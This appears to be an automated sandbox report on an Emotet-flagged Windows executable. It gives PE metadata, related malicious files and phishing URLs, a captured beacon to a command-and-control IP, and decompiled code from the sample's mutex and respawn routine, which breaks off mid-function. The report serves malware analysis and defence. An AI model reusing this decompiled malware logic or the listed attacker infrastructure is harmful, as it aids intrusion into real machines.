Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@8/0@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 41.1% (good quality ratio 37.4%) Quality average: 79.1% Quality standard deviation: 31%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
79.172.249.82	malware.exe	Get hash	malicious	Browse	79.172.249.82:443/
	zeD11Fztx8.exe	Get hash	malicious	Browse	79.172.249.82:443/
	9fdUNaHzLv.exe	Get hash	malicious	Browse	79.172.249.82:443/
	sample.exe.exe	Get hash	malicious	Browse	79.172.249.82:443/
	yxghUyIGb4.exe	Get hash	malicious	Browse	79.172.249.82:443/
	0HvIGwMmBV.exe	Get hash	malicious	Browse	79.172.249.82:443/
	pitEBNziGR.exe	Get hash	malicious	Browse	79.172.249.82:443/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	79.172.249.82:443/
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82:443/
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82:443/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	79.172.249.82:443/
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82:443/
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82:443/
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82:443/
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82:443/
	http://www.nzbodytalk.org.nz/INCORRECT-INVOICE/	Get hash	malicious	Browse	79.172.249.82:443/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	79.172.249.82:443/
	74039.exe	Get hash	malicious	Browse	79.172.249.82:443/
	Dokumente.doc	Get hash	malicious	Browse	79.172.249.82:443/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SZERVERNET-HU-ASHU	vEjGZyD0iN.exe	Get hash	malicious	Browse	79.172.249.82
	malware.exe	Get hash	malicious	Browse	79.172.249.82
	zeD11Fztx8.exe	Get hash	malicious	Browse	79.172.249.82
	9fdUNaHzLv.exe	Get hash	malicious	Browse	79.172.249.82
	sample.exe.exe	Get hash	malicious	Browse	79.172.249.82
	yxghUyIGb4.exe	Get hash	malicious	Browse	79.172.249.82
	0HvIGwMmBV.exe	Get hash	malicious	Browse	79.172.249.82
	pitEBNziGR.exe	Get hash	malicious	Browse	79.172.249.82
	https://kaliconsultancy.com/wp-content/uploads/2020/09/wflnfkqajn.php	Get hash	malicious	Browse	79.172.193.55
	https://delina.hu/praktikak/2016/02/01/csinalj-te-is-kreativ-mozaikkoveket	Get hash	malicious	Browse	95.140.36.82
	762002910000000.exe	Get hash	malicious	Browse	79.172.193.32
	1Wire_Copy.exe	Get hash	malicious	Browse	79.172.242.87
	430#U0437.js	Get hash	malicious	Browse	79.172.193.32
	59Transfer-copy.exe	Get hash	malicious	Browse	79.172.242.92
	25wire_slip.exe	Get hash	malicious	Browse	79.172.242.89
	BK.485799485.jse	Get hash	malicious	Browse	79.172.193.32
	PO 2312 CBD- 1302 S18.doc	Get hash	malicious	Browse	79.172.242.87
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	79.172.249.82
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vEjGZyD0iN.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007FB5D48CA8FEh
mov edx, 004011F0h
mov ecx, eax
call 00007FB5D48CA822h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007FB5D48CA8D9h
mov edx, 004010D0h
mov ecx, eax
call 00007FB5D48CA7FDh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007FB5D48D2C38h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007FB5D48CA25Ah
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007FB5D48D2C21h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/15/21-14:43:14.538617	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:14.574356	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/15/21-14:43:14.575191	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:14.612247	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/15/21-14:43:14.612715	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:14.647830	ICMP	449	ICMP Time-To-Live Exceeded in Transit	91.206.52.152	192.168.2.6
04/15/21-14:43:14.648162	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:18.221307	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:22.221249	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:26.221777	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:30.222209	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:34.222706	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:38.222816	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:42.222746	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:46.223375	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:50.223913	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/15/21-14:43:54.223872	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 14:43:24.645726919 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.700354099 CEST	443	49718	79.172.249.82	192.168.2.6
Apr 15, 2021 14:43:24.700769901 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.701332092 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.754362106 CEST	443	49718	79.172.249.82	192.168.2.6
Apr 15, 2021 14:43:24.754797935 CEST	443	49718	79.172.249.82	192.168.2.6
Apr 15, 2021 14:43:24.754858017 CEST	443	49718	79.172.249.82	192.168.2.6
Apr 15, 2021 14:43:24.754869938 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.754903078 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.755285978 CEST	49718	443	192.168.2.6	79.172.249.82
Apr 15, 2021 14:43:24.808232069 CEST	443	49718	79.172.249.82	192.168.2.6

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49718	79.172.249.82	443	C:\Windows\SysWOW64\lookupcart.exe

Timestamp	kBytes transferred	Direction	Data
Apr 15, 2021 14:43:24.701332092 CEST	1068	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 436 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 23 69 5d 58 20 f6 64 09 28 5b a9 4c 38 7e b6 f2 94 d0 14 cf 6f 25 39 c5 a1 11 49 f8 4c 0d 98 ca 13 46 0d 2d 27 fa 14 33 7a 63 0e 6f d0 51 e6 17 e5 2d 70 05 3d 55 4b 0a 09 0e 1b 99 f1 26 2c a5 bd af 4f f5 8a 78 af 49 3d e1 ee bf 07 04 ca 18 6c 44 b3 ad 3b 56 c3 20 0f 48 39 79 89 3b 23 32 65 79 9d 05 16 45 e6 8b 45 3d f9 21 58 a5 da 47 cc 17 fc 26 70 77 3e 04 b4 40 07 01 8a f5 e3 27 a6 78 4d 7e e9 96 86 c7 6e 1a 55 40 cd f4 62 6a 3e 68 57 70 ae c5 ec f7 12 67 ba ab 40 8e 94 d6 3f 19 f6 61 a2 06 93 f4 15 0f 17 00 05 5a fe 5d c1 b8 e3 26 4c 93 7e 4b 11 10 f2 8f 24 6c 38 41 39 76 ec 1a 38 2c 43 90 fa 66 a8 a0 f4 a1 69 a6 ad 1e 28 fa 89 07 3e da ed 3a 85 27 2c 72 0e c2 34 23 1c 68 87 cc f5 be 42 31 c9 20 dd 6b 3c 89 4c f2 43 a4 41 b7 5c 96 99 29 bb 9d 86 72 5e 86 c7 c5 a3 b1 fb 10 4f 0c 26 54 18 16 2c 68 f7 57 65 21 6a 38 46 34 6d c9 06 4b 2a ae b4 cd 83 59 e1 52 7f a4 bc ec 3e 24 5b 75 02 7e eb 7d b2 e6 a2 af e4 19 36 e2 e2 6f f1 03 3d 1b 34 2e ad 99 c8 0d 8d e5 19 d5 a7 52 f4 e7 54 48 ed dd 91 d4 20 72 1a 59 94 6c b7 df 9d d8 47 9d 49 6c 94 2a d4 a5 70 87 5d 7c 2e 63 b8 3e c9 48 52 3b 04 30 03 56 d2 91 4c 8d e1 96 a3 9a 39 a5 ba 45 25 49 4f 64 9f 6d 78 3e 71 95 92 af e5 f9 55 21 d7 e5 89 3d e7 f6 53 01 a0 c6 4e 24 e3 68 d7 a8 73 80 21 7d 87 07 0a f1 3f f2 a0 e5 e0 a4 a4 34 c9 ec 43 4a 12 ac Data Ascii: #i]X d([L8~o%9ILF-'3zcoQ-p=UK&,OxI=lD;V H9y;#2eyEE=!XG&pw>@'xM~nU@bj>hWpg@?aZ]&L~K$l8A9v8,Cfi(>:',r4#hB1 k<LCA\)r^O&T,hWe!j8F4mKYR>$[u~}6o=4.RTH rYlGIlp]\|.c>HR;0VL9E%IOdmx>qU!=SN$hs!}?4CJ
Apr 15, 2021 14:43:24.754797935 CEST	1069	IN	HTTP/1.1 400 Bad Request Date: Thu, 15 Apr 2021 12:43:24 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: vEjGZyD0iN.exe PID: 7056 Parent PID: 6084

General

Start time:	14:43:14
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vEjGZyD0iN.exe'
Imagebase:	0x980000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.326121826.0000000000981000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vEjGZyD0iN.exe PID: 7084 Parent PID: 7056

General

Start time:	14:43:15
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Imagebase:	0x980000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.327122709.0000000000981000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.335148697.0000000000981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: lookupcart.exe PID: 3832 Parent PID: 560

General

Start time:	14:43:18
Start date:	15/04/2021
Path:	C:\Windows\SysWOW64\lookupcart.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\lookupcart.exe
Imagebase:	0x980000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.334582341.0000000000981000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000000.333230150.0000000000981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: lookupcart.exe PID: 644 Parent PID: 3832

General

Start time:	14:43:18
Start date:	15/04/2021
Path:	C:\Windows\SysWOW64\lookupcart.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\lookupcart.exe
Imagebase:	0x980000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.404026613.0000000000981000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000000.334160361.0000000000981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4792 Parent PID: 560

General

Start time:	14:43:24
Start date:	15/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6564 Parent PID: 560

General

Start time:	14:43:42
Start date:	15/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vEjGZyD0iN.exe PID: 7056 Parent PID: 6084 vEjGZyD0iN.exeCOMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	518
Total number of Limit Nodes:	3

Executed Functions

Function 009815B0, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E009815B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E009819E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E00981830(0x981004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0x98c200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E00981830(0x981000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0x98c200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E00989C50(0x981000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x009815c9
0x009815cf
0x009815d5
0x009815d9
0x009815df
0x009815ef
0x009815f4
0x00981602
0x00981615
0x0098162e
0x00981633
0x00981641
0x00981654
0x0098166d
0x00981671
0x00981692
0x00981698
0x00981673
0x0098167e
0x00981684
0x00981688
0x009816a4
0x009816d3
0x009816dc
0x009816e6
0x00981707
0x0098170f
0x00000000
0x00981711
0x00981714
0x0098171d
0x00981726
0x0098172d
0x00981734
0x00981744
0x00981744
0x009816a6
0x009816a7
0x009816ae
0x009816b5
0x009816bb
0x009816ca
0x009816ca
0x0098168a
0x0098168b
0x00000000
0x0098168b
0x00981688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 009815C9

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

_snwprintf.NTDLL ref: 00981602
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098160E
HeapFree.KERNEL32(00000000), ref: 00981615
_snwprintf.NTDLL ref: 00981641
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098164D
HeapFree.KERNEL32(00000000), ref: 00981654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00981667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0098167E
CloseHandle.KERNEL32(00000000), ref: 0098168B
GetLastError.KERNEL32 ref: 00981699
SetEvent.KERNEL32(00000000), ref: 009816A7
CloseHandle.KERNEL32(00000000), ref: 009816AE
CloseHandle.KERNEL32(00000000), ref: 009816B5
memset.NTDLL ref: 009816D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00981707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00981714
CloseHandle.KERNEL32(?), ref: 0098171D
CloseHandle.KERNEL32(?), ref: 00981726
CloseHandle.KERNEL32(00000000), ref: 0098172D
CloseHandle.KERNEL32(00000000), ref: 00981734

Strings

D, xrefs: 009816DC
@Mxt, xrefs: 00981699

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: @Mxt$D
API String ID: 2830143876-1674779623
Opcode ID: 055306878dd50732a8caac63a07b6eb8eafad0505bd3a71c7e7fa629ff0c68d1
Instruction ID: 30e91fc0fce9e76a717b74474b13cdd9d7d355b1a6e9612adefec6084438dc99
Opcode Fuzzy Hash: 055306878dd50732a8caac63a07b6eb8eafad0505bd3a71c7e7fa629ff0c68d1
Instruction Fuzzy Hash: B541D2B1918108BBEB10ABA4EC8DFEE7B7CEF44716F040051F609E6391DB749A419BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00981599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00981599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E009819E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E00981830(0x981004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0x98c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E00981830(0x981000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0x98c200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
